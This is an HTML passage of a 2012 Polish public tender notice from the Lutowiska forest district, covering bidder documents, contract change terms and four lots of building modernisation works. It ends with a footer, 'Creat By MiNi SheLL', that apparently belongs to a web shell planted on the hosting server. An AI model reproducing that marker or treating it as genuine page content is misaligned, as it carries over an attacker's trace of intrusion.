<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty należy dołączyć:
  a) Pełnomocnictwo osób podpisujących ofertę do podejmowania   
      zobowiązań w imieniu firmy składającej ofertę, jeżeli nie wynika to z  
     dokumentów wymienionych,
  b) Kosztorys ofertowy,
  c) Zaleca się również dołączyć do oferty  dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 

1.	potrzeby wprowadzenia zmian w Specyfikacji technicznej wykonania 
i odbioru robót budowlanych, będących podstawą realizacji przedmiotu Umowy, wywołanej zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej lub zmianą funkcji użytkowej, a także zmianami uwarunkowań środowiskowych, technicznych, technologicznych lub innymi okolicznościami;

2.	potrzeby wprowadzenia zmian w miejscu i sposobie wykonania robót budowlanych, wynikających ze zmian technologicznych, osobowych, 
w organizacji spełnienia świadczenia, spowodowanych zmianami 
w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych lub innymi okolicznościami;

3.	zmiany lokalizacji  inwestycji gdy konieczność ta wyniknie z badań  geologicznych lub  hydrologicznych lub z uwagi na możliwość  podniesienie jej  opłacalności lub  zaleceń organów opiniujących, zezwalających, kontrolujących lub innych.

4.	rezygnacji z wykonania części (całości)  zamówienia (umowy) w 
przypadku,   gdy:
-  planowana inwestycja okaże się nieopłacalną lub gdy konieczność ta   
   wyniknie z  badań  geologicznych lub  hydrologicznych, 
- z uwagi na  możliwość podniesienie jej  opłacalności, 
-  na podstawie zaleceń organów  opiniujących,  zezwalających 
   kontrolujących lub innych,
- ze względu na brak wymaganych pozwoleń formalno-prawnych  
   niezbędnych do realizacji prac.
        e)  w razie zaistnienie istotnej zmiany okoliczności powodującej, że wykonanie 
             umowy nie leży w interesie publicznym, czego nie można było przewidzieć  
             w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w  
            terminie 30  dni od powzięcia wiadomości o tych okolicznościach. 
        f)   w przypadku, o którym mowa w pkt. d Wykonawca może żądać wyłącznie 
             wynagrodzenia z tytułu wykonania części umowy.
5.	konieczności zmiany terminu realizacji spowodowanej:
-    wystąpieniem warunków atmosferycznych mających wpływ na brak możliwości lub utrudnienie wykonywania umowy, np. długotrwałe intensywne opady, wyskoki poziom wody powodujący konieczność przerwania robót, lub opóźniający ich rozpoczęcie itp.;
-  zmianami wynikającymi ze zmian przepisów prawa, norm, standardów, wiedzy technicznej, warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi, ochrony środowiska, itp., 
- okolicznościami, których nie można było przewidzieć w chwili zawarcia Umowy;
- okolicznościami leżącymi po stronie Zamawiającego;
- okolicznościami będącymi następstwem działania organów administracji i innych podmiotów trzecich, a także działania siły wyższej.
6.	zmiany wynagrodzenia w przypadku zmian stawki podatku VAT, wynikających z obowiązujących w tym zakresie przepisów.
7.	zmiany wynagrodzenia umownego w przypadku ograniczenia zakresu przedmiotowego umowy.
8.	   przyczyn zewnętrznych niezależnych od zamawiającego oraz wykonawcy  skutkujących niemożliwością prowadzenia działań w celu wykonania umowy. 
                    Ponadto Zamawiający dopuszcza możliwość zmian redakcyjnych umowy, zmian będących następstwem zmian danych zarówno jego jak i Wykonawcy, w tym ujawnionych w rejestrach publicznych (np. zmiana oznaczenia adresu, nazwy wykonawcy, osoby uprawnionej do kontaktów) oraz innych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty. W takiej sytuacji, wprowadzenie do umowy stosownych zmian nie stanowiących zmian treści umowy w stosunku do treści oferty nie będzie wymagało zachowania formy pisemnej, a jedynie notatki/protokołu zatwierdzonego przez przedstawicieli obu stron.
                     Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z przepisów prawa, w tym w szczególności nie mogą powodować wykroczenia poza określenie przedmiotu zamówienia zawarte w SIWZ, zgodnie z art. 140 ust. 3 ustawy Pzp (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 ze zm.) oraz nie mogą powodować obejścia przepisu art. 144 ustawy Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_krosno/nadl_lutowiska/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Lutowiska
38 - 713 Lutowiska 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2012 godzina 14:00, miejsce: Nadleśnictwo Lutowiska
38 - 713 Lutowiska 4 (Sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Tryb udzielenia zamówienia
	Do udzielenia przedmiotowego zamówienia stosuje się przepisy ustawy z dnia 29 stycznia 2004 r.- Prawo zamówień publicznych z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst ujednolicony Dz. U. z 2010r.  nr 113, poz. 759 ), zwanej dalej ustawą lub ustawą Pzp oraz w sprawach nieuregulowanych ustawą, przepisy ustawy - Kodeks cywilny.
Postępowanie jest prowadzone w trybie przetargu nieograniczonego na podstawie art. 39 - 46 ustawy. 
         Zamówienie na roboty budowlane jest o wartości mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8  ustawy Pzp.

2. Informacje o ofercie wariantowej, umowie ramowej i aukcji elektronicznej:
     - Zamawiający nie dopuszcza składania ofert wariantowych,
     - Zamawiający nie przewiduje zawarcia umowy ramowej,
     - Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem    
        aukcji elektronicznej ani utworzenia dynamicznego systemu zakupów.

3. Zamawiający dopuszcza składania ofert częściowych.

4.Inne postanowienia SIWZ

- Zamawiający przewiduje możliwość udzielania zamówień uzupełniających, o 
         których mowa w art. 67 ust. 1 pkt. 6 ustawy, polegających na powtórzeniu     
         prac będących przedmiotem zamówienia lub jego części o wartości do 50% 
         wartości zamówienia podstawowego w okresie 3 lat od udzielenia zamówienia 
        podstawowego (od terminu podpisania umowy). 
- Rozliczenia między Zamawiającym, a Wykonawcą będą prowadzone w 
         walucie polskiej.
- Zamawiający żąda wskazania przez Wykonawcę o  ofercie części zamówienia, 
         której wykonanie powierzy podwykonawcom.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I
- roboty modernizacyjne budynku jednorodzinnego Leśniczówka Paniszczew, nr inwent.165/30.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót modernizacyjnych i remontowych w budynku jednorodzinnego leśniczówka Paniszczew w m.Olchowiec 2  przewidziany do wykonania:

1.	demontaż instalacji odgromowej na budynku
2.	rozbiórka pokrycia dachowego z płyt azbestowo- cementowych
3.	demontaż obróbek blacharskich dachu
4.	demontaż rynien dachowych i rur spustowych
5.	wymiana uszkodzonych elementów więźby dachowej oraz montaż łat na dachu
6.	dobudowanie elementów poszerzonej lukarny
7.	rozbiórka i ponowne przemurowanie górnych odcinków kominów oraz montaż czap kominowych
8.	montaż okna lukarny
9.	ułożenie folii paroprzepuszczalnej na połaciach dachowych
10.	ułożenie nowego pokrycia dachu z blachy trapezowej powlekanej
11.	montaż dachowego okna włazowego
12.	montaż nowych obróbek blacharskich
13.	montaż nowych rynien i rur spustowych
14.	wykonanie podbitki z desek struganych przy okapach dachu
15.	montaż instalacji odgromowej łącznie z otokiem wokół budynku pomiary elektryczne
16.	wymiana okien i stolarki drzwiowej łącznie z ościeżnicami 
17.	montaż ramowych rusztowań zewnętrznych elewacyjnych
18.	docieplenie elewacji warstwą styropianu z ułożeniem tynku akrylowego
19.	montaż zewnętrznych parapetów z blachy powlekanej
20.	rozbiórka zewnętrznych schodów żelbetowych
21.	przygotowanie deskowań nowych schodów zewnętrznych
22.	przygotowanie i montaż zbrojenia
23.	wylewanie schodów z betonu konstrukcyjnego 
24.	montaż balustrad schodowych ze stali nierdzewnej
25.	wykonanie okładzin schodów z płytek gresowych
26.	wymiana  podokienników wewnętrznych
27.	rozebranie części ścianek wewnętrznych
28.	demontaż boazerii oraz skucie starych, uszkodzonych tynków wewnętrznych
29.	rozebranie posadzek z tworzyw sztucznych łącznie z podłogami drewnianymi i legarami
30.	usunięcie podsypki podpodłogowej z gliny 
31.	wykonanie warstwy chudego betonu pod posadzki wylewane
32.	założenie izolacji z folii polietylenowej
33.	wykonanie wylewek z zaprawy cementowej zbrojonych wkładami z siatki zgrzewanej
34.	 wykonanie tynków wewnętrznych uzupełniających oraz gładzi gipsowych na ścianach
35.	montaż sufitów podwieszanych z płyt GKB 
36.	ułożenie podłóg z desek struganych z cyklinowaniem i lakierowaniem
37.	ułożenie posadzek z płytek gresowych
38.	licowanie ścian płytkami ceramicznymi
39.	roboty malarskie wewnętrzne
40.	wymiana drewnianych schodów wewnętrznych
41.	wymiana instalacji wewnętrznej wodociągowej
42.	wymiana instalacji c.o. wraz z kotłem na paliwo stałe
43.	wymiana instalacji wewnętrznej kanalizacyjnej
44.	wymiana armatury wodociągowej i kanalizacyjnej - montaż kabiny natryskowej, wanny z obudową, umywalki porcelanowej oraz miski ustępowej 
45.	wywiezienie gruzu z terenu budowy 
46.	utylizacja płyt azbestowo- cementowych pochodzących z rozbiórki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.42.00.00-7, 45.32.10.00-3, 45.31.70.00-2, 45.33.00.00-9, 45.45.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II
- roboty modernizacyjne w budynku dwurodzinnego Lipie 14, nr inwent.165/93.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane roboty w budynku dwurodzinnym w Lipiu nr inwent. 165/93 mają na celu wydzielenie odrębnej kotłowni dla mieszkania nr 2 na II piętrze i poddaszu. Rozdzielone zostaną także instalacje centralnego ogrzewania na dwa niezależne układy. Projektuje się zainstalowanie kotła o mocy 16 kW. Zgodnie z zaleceniem inwestora projektuje się układ dwóch kominów - dymowy i wentylacyjny wykonane w technologii blach stalowych nierdzewnych . Konstrukcja komina dymowego z uwagi na agresywność spalin z kotła na paliwo stałe została przyjęta w wersji tzw. hybrydowej tj. płaszcz zewnętrzny i ocieplenie są tradycyjne, ale wewnętrzna konstrukcja kanału dymowego posiada zwiększoną odporność na agresją związków spalania węgla i drewna. Jest to kanał ceramiczny. Wentylacja w postaci kanału fi 200 mm z dociepleniem. Opis komina i oferta handlowa zawarta jest w projekcie.


Zakres robót przebudowy kotłowni w budynku Lipie 14, przewidziany do wykonania:

1	Odcięcie instalacji c.o. II piętra i poddasza na poziomie I piętra -     
            rozdzielenie instalacji
2	Montaż na starej instalacji zaworów odpowietrzających
3	Montaż naczynia wzbiorczego na I piętrze
4	Demontaż starych grzejników na II piętrze i poddaszu oraz instalacji c.o.
5	Wykonanie nowej instalacji c.o. na II piętrze i poddaszu od kotłowni aż 
           po naczynie wzbiorcze
6	Montaż nowych grzejników typu G500
7	Montaż osprzętu instalacji c.o. na poddaszu - naczynie wzbiorcze, przelew, 
           zawory odpowietrzające
8	Demontaż części ściany z nowej kotłowni
9	Budowa nowej ścianki działowej w miejscu wskazanym na projekcie
10	Wymiana drzwi w kotłowni
11	Przebicie otworu dla nowych drzwi z zewnątrz w miejscu istniejącego 
          okna
12	Wykonanie schodków do przejścia z zewnątrz
          (różnica poziomów ok. 60 cm)
13	Montaż zadaszenia nad wejściem z poliwęglanu
14	Wykonanie instalacji wodociągowej i kanalizacyjnej w nowej kotłowni łącznie z 
           kratką posadzkową
15	Instalacja elektryczna - oświetlenie, zasilanie 230 i 24 V
16	Nowa posadzka w kotłowni z izolacją poziomą z folii budowlanej
17	Okładziny posadzki i ścian z płytek
18	Montaż boksu na składowanie węgla lub drewna
19	Montaż okienka zasypowego od strony garażu
20	Montaż kotła węglowego
21	Montaż konstrukcji wsporczej kominów - dymowego i wentylacyjnego 
22	Montaż kominów ze stali nierdzewnej z wkładem ceramicznym 
23	Ustawienie rusztowań
24	Demontaż okładzin siding II piętra i poddasza na każdej elewacji
25	Mocowanie płyt z wełny mineralnej
26	Montaż sidingu i listew wykończeniowych
27	Wykonanie koryta pod chodnik przy budynku
28	Ułożenie podbudowy chodnika z kruszyw naturalnych
29	Ułożenie obrzeży chodnikowych
30	Ułożenie kostki brukowej gr. 6 cm na podsypce cementowo - piaskowej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.42.00.00-7, 45.32.10.00-3, 45.31.70.00-2, 45.33.00.00-9, 45.45.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III
- roboty modernizacyjne  budynku wielorodzinnego Smolnik 1, nr inwent.165/99
- roboty modernizacyjne  budynku gospodarczego (garaż-archiwum) w  Lutowiskach, nr inwent.187/94.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót wymiany pokrycia i elementów konstrukcji stropodachu na budynku wielorodzinnym Smolnik 1, przewidziany do wykonania:
1. Rozbiórka pokrycia z papy na lepiku asfalt., obróbek blacharskich i instalacji 
    odgromowej,
2. Wzmocnienie istniejącej konstrukcji dachu przez dołożenie nowych kratownic 
     drewnianych i łacenia,
3. Przemurowanie odcinków kominów w części stropodachowej i ponad   
    dachem,
4. Ułożenie izolacji cieplnych i przeciwwilgociowych,
5. Montaż nowego pokrycia z blachy trapezowej powlekanej i obróbek 
    blacharskich,
6. Montaż orynnowania i rur spustowych,
7. Montaż instalacji odgromowej.


 Zakres robót wymiany pokrycia i elementów konstrukcji stropodachu na     
 budynku gospodarczego (garaż-archiwum) w  Lutowiskach, nr inwent.187/94, 
 przewidziany do wykonania:
      1. Rozbiórka pokrycia z papy na lepiku asfalt., obróbek blacharskich i instalacji 
          odgromowej,
2. Wzmocnienie istniejącej konstrukcji dachu przez dołożenie nowych kratownic 
    drewnianych i łacenia,
3. Przemurowanie odcinków kominów w części stropodachowej i ponad 
     dachem,
4. Ułożenie izolacji cieplnych i przeciwwilgociowych,
5. Montaż nowego pokrycia z blachy trapezowej powlekanej i obróbek 
     blacharskich,
6. Montaż rynien i rur spustowych,
7. Montaż instalacji odgromowej,
8. Wykonanie elewacji w technologii lekko-mokrej,
9. Wymiana stolarki okiennej i drzwiowej w istniejących otworach,
10. przemurowanie komina w kotłowni,
11. Wykonanie tynków cementowo-wapiennych i posadzki w pomieszczeniu 
      kotłownia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.42.00.00-7, 45.32.10.00-3, 45.31.70.00-2, 45.33.00.00-9, 45.45.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV
- roboty modernizacyjne i remontowe budynków gospodarczych: Lutowiska   nr inwent.182/25, Polana nr inwent.182/30, Sękowiec nr inwent.182/29.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres robót wymiany pokrycia budynków gospodarczych: Lutowiska   nr inwent.182/25, Polana nr inwent.182/30, Sękowiec nr inwent.182/29, przewidziany do wykonania:
       1.Rozbiórka pokryć dachowych z płyt azbestowo-cementowych falistych, obróbek blacharskich i instalacji odgromowej,
2. Wzmocnienie istniejącej konstrukcji dachu i łacenia,
3. Montaż nowego pokrycia z blachy trapezowej powlekanej i obróbek 
    blacharskich,
4. Montaż rynien i rur spustowych,
5. Montaż instalacji odgromowej
6. Wymiana zużytej stolarki okiennej i drzwiowej,
7. Naprawa tynków i malowanie emulsyjne elewacji..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.42.00.00-7, 45.32.10.00-3, 45.31.70.00-2, 45.33.00.00-9, 45.45.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com